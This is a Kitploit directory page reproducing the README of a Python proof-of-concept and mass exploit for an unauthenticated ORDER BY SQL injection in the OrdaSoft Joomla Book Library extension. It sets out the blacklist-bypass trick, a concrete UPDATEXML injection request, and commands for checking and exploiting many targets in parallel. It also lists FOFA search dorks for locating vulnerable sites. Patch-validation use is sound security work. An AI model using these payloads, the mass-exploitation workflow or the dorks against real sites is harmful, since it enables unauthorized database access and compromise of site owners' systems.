Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-101110 — Python 3 PoC and mass exploit for CVE-2026-101110, an unauthenticated ORDER BY SQL injection in OrdaSoft Joomla Book Library <=6.4.6 via field/direction parameters. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-101110
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationScripting & AutomationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-101110

CVE-2026-101110

Python 3 PoC and mass exploit for CVE-2026-101110, an unauthenticated ORDER BY SQL injection in OrdaSoft Joomla Book Library <=6.4.6 via field/direction parameters.

4 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

CVE-2026-101110 — OrdaSoft Book Library (Free) unauthenticated SQL injection

Python 3 PoC for CVE-2026-101110 — OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6. Upgrade to 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Cataloghttps://pocbit.org/pocs/
Componentcom_booklibrary
File / functionsite/booklibrary.php → books()
Parametersfield, direction (sort)
AuthNone (public book listings)
CWECWE-89 SQL Injection
CVSS 4.09.3 Critical (Joomla CNA)
CreditAla Arfaoui

Vulnerability summary (Türkçe)

Book Library (Free), Joomla’da kitap kütüphanesi / kategori listeleri sunan OrdaSoft eklentisidir. 6.4.6 ve önceki sürümlerde, books() fonksiyonu field ve direction parametrelerini protectInjectionWithoutQuote() ile filtreler. Bu fonksiyon yalnızca select alt dizgisini arayan zayıf bir kara liste uygular; bulunca değeri $db->quote() ile sarar, reddetmez.

Değerler sonrasında tırnaksız ORDER BY ifadesine eklenir — burada quote kullanmak SQL enjeksiyonunu durdurmaz (CNA açıklaması).

İstismar için iki koşul:

  1. Oturum priming: İlk istek, oturumda saklanan varsayılan sıralama (field / direction) değerlerini yazar.
  2. Kara liste bypass: İkinci istekte, yükün sonuna -- xselect decoy yorumu eklenir; kara liste kontrolünü geçer, SQL yorumu geri kalan yükü etkilemez.

Sonuç: kimlik doğrulaması olmadan ORDER BY SQLi, veritabanı okuma/yazma ve site bütünlüğü açısından kritik risk.


Technical mechanism

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

Weak filter (conceptual):

  • Input contains select (substring) → wrap entire value in quotes (irrelevant in ORDER BY context).
  • Attacker adds -- xselect so the blacklist sees select inside the comment tail while the active expression before -- remains executable SQL (error-based / UPDATEXML / stacked ORDER BY tricks).

PoC implements:

StepAction
Fingerprintcom_booklibrary paths + optional manifest version
Route discoveryshowCategory, search, showBooks, books, … + scraped catid / Itemid
checkPrime session → confirm SQLi (flag / VERSION())
exploitPrime → --subquery extract (default SELECT VERSION())
mass--list + -j parallel targets; exploited.txt on successful leak

Payload suffix constant in code: -- xselect (BLACKLIST_DECOY).


Requirements

cd CVE-2026-101110
pip install -r requirements.txt

Usage

Single target

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

Mass bulk (exploit-first workflow)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagMeaning
--aggressiveCheck mode attempts version leak after prime
--subqueryInner expression for UPDATEXML / double-query payloads
--exploited-listTab-separated successful extracts
--no-colorDisable ANSI (also NO_COLOR)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


Example HTTP

Prime (session):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

Inject (PoC appends decoy):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

POST variants are attempted on the same route when GET fails.


Version detection

Manifest (if exposed):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → vulnerable line; ≥ 6.4.7 → patched (patched_version in check output).


FOFA dorks

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

Related OrdaSoft CVEs (Sep 2026)

CVEExtensionIssueFixed
CVE-2026-101110Book LibraryORDER BY SQLi + blacklist bypass6.4.7
CVE-2026-101111Book LibraryReflected XSS (title param)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

Patch all OrdaSoft components you deploy.


References

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Historical: older com_booklibrary SQLi in search/lend tasks (CVE-2010-1522) — different code paths

Legal

Authorized testing and patch validation only.


GitHub repository description

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
Download Tool